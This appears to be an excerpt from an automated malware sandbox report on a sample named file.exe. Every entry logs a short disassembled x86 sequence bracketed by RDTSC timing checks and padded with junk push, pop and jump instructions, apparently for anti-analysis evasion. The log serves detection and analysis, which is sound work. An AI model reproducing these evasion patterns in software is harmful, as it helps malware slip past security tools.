                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0117B second address: 4A011B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 push edi 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx], eax 0x0000000d pushad 0x0000000e movsx edi, cx 0x00000011 mov di, si 0x00000014 popad 0x00000015 mov eax, dword ptr [esi+04h] 0x00000018 jmp 00007F99FD381EF6h 0x0000001d mov dword ptr [edx+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A011B2 second address: 4A011B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A011B8 second address: 4A01201 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+08h] 0x0000000c jmp 00007F99FD381EF0h 0x00000011 mov dword ptr [edx+08h], eax 0x00000014 jmp 00007F99FD381EF0h 0x00000019 mov eax, dword ptr [esi+0Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov cx, dx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01201 second address: 4A01206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01206 second address: 4A0122D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [edx+0Ch], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F99FD381EF6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0122D second address: 4A01231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01231 second address: 4A01237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01237 second address: 4A012A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99FCCDC7DCh 0x00000009 xor eax, 7F1BA538h 0x0000000f jmp 00007F99FCCDC7DBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [esi+10h] 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F99FCCDC7DBh 0x00000022 add esi, 40040AFEh 0x00000028 jmp 00007F99FCCDC7E9h 0x0000002d popfd 0x0000002e jmp 00007F99FCCDC7E0h 0x00000033 popad 0x00000034 mov dword ptr [edx+10h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A012A6 second address: 4A012AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A012AA second address: 4A012B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A012B0 second address: 4A012B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A012B5 second address: 4A012D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esi+14h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F99FCCDC7E8h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A012D9 second address: 4A012DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A012DF second address: 4A01336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+14h], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F99FCCDC7DCh 0x00000015 xor ch, FFFFFFE8h 0x00000018 jmp 00007F99FCCDC7DBh 0x0000001d popfd 0x0000001e mov esi, 458D49DFh 0x00000023 popad 0x00000024 mov eax, dword ptr [esi+18h] 0x00000027 jmp 00007F99FCCDC7E2h 0x0000002c mov dword ptr [edx+18h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01336 second address: 4A0133A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0133A second address: 4A01340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01340 second address: 4A013A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+1Ch] 0x0000000c jmp 00007F99FD381EF0h 0x00000011 mov dword ptr [edx+1Ch], eax 0x00000014 jmp 00007F99FD381EF0h 0x00000019 mov eax, dword ptr [esi+20h] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F99FD381EEEh 0x00000023 or cl, 00000038h 0x00000026 jmp 00007F99FD381EEBh 0x0000002b popfd 0x0000002c push eax 0x0000002d push edx 0x0000002e mov si, A805h 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A013A6 second address: 4A01426 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 2AE5BF81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [edx+20h], eax 0x0000000d pushad 0x0000000e movzx ecx, di 0x00000011 pushfd 0x00000012 jmp 00007F99FCCDC7DFh 0x00000017 sbb eax, 7D4BDAAEh 0x0000001d jmp 00007F99FCCDC7E9h 0x00000022 popfd 0x00000023 popad 0x00000024 mov eax, dword ptr [esi+24h] 0x00000027 pushad 0x00000028 mov esi, 3E3E9BD3h 0x0000002d mov di, ax 0x00000030 popad 0x00000031 mov dword ptr [edx+24h], eax 0x00000034 jmp 00007F99FCCDC7E2h 0x00000039 mov eax, dword ptr [esi+28h] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F99FCCDC7E7h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01426 second address: 4A01470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov edx, 37623AF6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [edx+28h], eax 0x00000010 pushad 0x00000011 mov ebx, 5281B2CEh 0x00000016 pushfd 0x00000017 jmp 00007F99FD381EEFh 0x0000001c and cl, 0000007Eh 0x0000001f jmp 00007F99FD381EF9h 0x00000024 popfd 0x00000025 popad 0x00000026 mov ecx, dword ptr [esi+2Ch] 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01470 second address: 4A014B7 instructions: 0x00000000 rdtsc 0x00000002 mov dl, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov eax, ebx 0x00000009 pushfd 0x0000000a jmp 00007F99FCCDC7DDh 0x0000000f add cx, 1066h 0x00000014 jmp 00007F99FCCDC7E1h 0x00000019 popfd 0x0000001a popad 0x0000001b popad 0x0000001c mov dword ptr [edx+2Ch], ecx 0x0000001f pushad 0x00000020 mov di, cx 0x00000023 mov esi, 5800CB8Fh 0x00000028 popad 0x00000029 mov ax, word ptr [esi+30h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A014B7 second address: 4A014CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A014CE second address: 4A0151C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99FCCDC7DFh 0x00000008 jmp 00007F99FCCDC7E8h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov word ptr [edx+30h], ax 0x00000014 jmp 00007F99FCCDC7E0h 0x00000019 mov ax, word ptr [esi+32h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ch, bh 0x00000022 movzx ecx, dx 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0151C second address: 4A01522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01522 second address: 4A01526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01526 second address: 4A015F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F99FD381EF1h 0x00000014 sub ch, 00000046h 0x00000017 jmp 00007F99FD381EF1h 0x0000001c popfd 0x0000001d mov ecx, 79BCADF7h 0x00000022 popad 0x00000023 popad 0x00000024 mov eax, dword ptr [esi+34h] 0x00000027 jmp 00007F99FD381EEAh 0x0000002c mov dword ptr [edx+34h], eax 0x0000002f jmp 00007F99FD381EF0h 0x00000034 test ecx, 00000700h 0x0000003a pushad 0x0000003b call 00007F99FD381EEEh 0x00000040 mov bh, al 0x00000042 pop edx 0x00000043 push ecx 0x00000044 mov edi, 5168EBDEh 0x00000049 pop ebx 0x0000004a popad 0x0000004b jne 00007F9A6E2B005Bh 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 pushfd 0x00000055 jmp 00007F99FD381EF7h 0x0000005a or eax, 085BB13Eh 0x00000060 jmp 00007F99FD381EF9h 0x00000065 popfd 0x00000066 call 00007F99FD381EF0h 0x0000006b pop ecx 0x0000006c popad 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A015F5 second address: 4A01610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FCCDC7E7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01610 second address: 4A01614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01614 second address: 4A01626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+38h], FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01626 second address: 4A0162A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0162A second address: 4A0162E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0162E second address: 4A01634 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01634 second address: 4A016FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99FCCDC7DFh 0x00000009 and eax, 34E9215Eh 0x0000000f jmp 00007F99FCCDC7E9h 0x00000014 popfd 0x00000015 mov dx, si 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b or dword ptr [edx+3Ch], FFFFFFFFh 0x0000001f jmp 00007F99FCCDC7DAh 0x00000024 or dword ptr [edx+40h], FFFFFFFFh 0x00000028 pushad 0x00000029 jmp 00007F99FCCDC7DEh 0x0000002e pushfd 0x0000002f jmp 00007F99FCCDC7E2h 0x00000034 or esi, 4FECE7B8h 0x0000003a jmp 00007F99FCCDC7DBh 0x0000003f popfd 0x00000040 popad 0x00000041 pop esi 0x00000042 jmp 00007F99FCCDC7E6h 0x00000047 pop ebx 0x00000048 pushad 0x00000049 mov bx, si 0x0000004c call 00007F99FCCDC7DAh 0x00000051 jmp 00007F99FCCDC7E2h 0x00000056 pop ecx 0x00000057 popad 0x00000058 leave 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F99FCCDC7DCh 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F01BB second address: 49F01C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F01C1 second address: 49F01C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F01C5 second address: 49F01D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, ecx 0x0000000f mov ch, A4h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F01D7 second address: 49F01DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F01DD second address: 49F01E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F01E1 second address: 49F01F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ch, dl 0x0000000e mov dx, si 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F01F3 second address: 49F01F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F01F9 second address: 49F01FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F02D0 second address: 49F02E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov dx, si 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0D0E second address: 49D0D3F instructions: 0x00000000 rdtsc 0x00000002 mov dl, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F99FCCDC7DAh 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov al, dl 0x00000015 jmp 00007F99FCCDC7E6h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0D3F second address: 49D0D45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0D45 second address: 49D0D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107E1 second address: 4A107E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107E7 second address: 4A10837 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ecx, ebx 0x0000000f pushfd 0x00000010 jmp 00007F99FCCDC7E9h 0x00000015 and si, 5396h 0x0000001a jmp 00007F99FCCDC7E1h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10837 second address: 4A1083D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1083D second address: 4A10841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106CF second address: 4A106E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FD381EF5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106E8 second address: 4A106EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106EC second address: 4A10710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F99FD381EECh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F99FD381EEAh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10710 second address: 4A10714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10714 second address: 4A1071A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1071A second address: 4A10772 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F99FCCDC7DCh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F99FCCDC7DBh 0x0000000f and cl, 0000007Eh 0x00000012 jmp 00007F99FCCDC7E9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e mov dh, al 0x00000020 mov edi, 39D7048Ch 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F99FCCDC7DEh 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10772 second address: 4A10778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10778 second address: 4A1077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1063E second address: 4A10642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10642 second address: 4A1065F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1065F second address: 4A1066F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FD381EECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10AD8 second address: 4A10ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10ADC second address: 4A10AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10AE2 second address: 4A10AF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FCCDC7DBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10AF1 second address: 4A10AF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10AF5 second address: 4A10B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a movsx edx, cx 0x0000000d mov di, ax 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 jmp 00007F99FCCDC7E6h 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ecx, edi 0x0000001e pushfd 0x0000001f jmp 00007F99FCCDC7E9h 0x00000024 sbb eax, 07C8D076h 0x0000002a jmp 00007F99FCCDC7E1h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10857 second address: 4A1085B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1085B second address: 4A10861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10861 second address: 4A108D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e movsx edx, si 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 call 00007F99FD381EF9h 0x00000019 mov cx, 4CB7h 0x0000001d pop eax 0x0000001e mov dl, 56h 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F99FD381EF4h 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F99FD381EF7h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A108D4 second address: 4A108DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A108DA second address: 4A108DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A108DE second address: 4A10907 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F99FCCDC7E5h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0872 second address: 49E0876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0876 second address: 49E087C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E087C second address: 49E0897 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0897 second address: 49E089D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E089D second address: 49E08AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FD381EEBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E08AC second address: 49E08DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F99FCCDC7DCh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E08DA second address: 49E08F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, dx 0x00000010 mov ebx, 64E374E2h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E08F6 second address: 49E0940 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F99FCCDC7DDh 0x00000014 sbb eax, 2CF87D66h 0x0000001a jmp 00007F99FCCDC7E1h 0x0000001f popfd 0x00000020 mov edx, ecx 0x00000022 popad 0x00000023 rdtsc
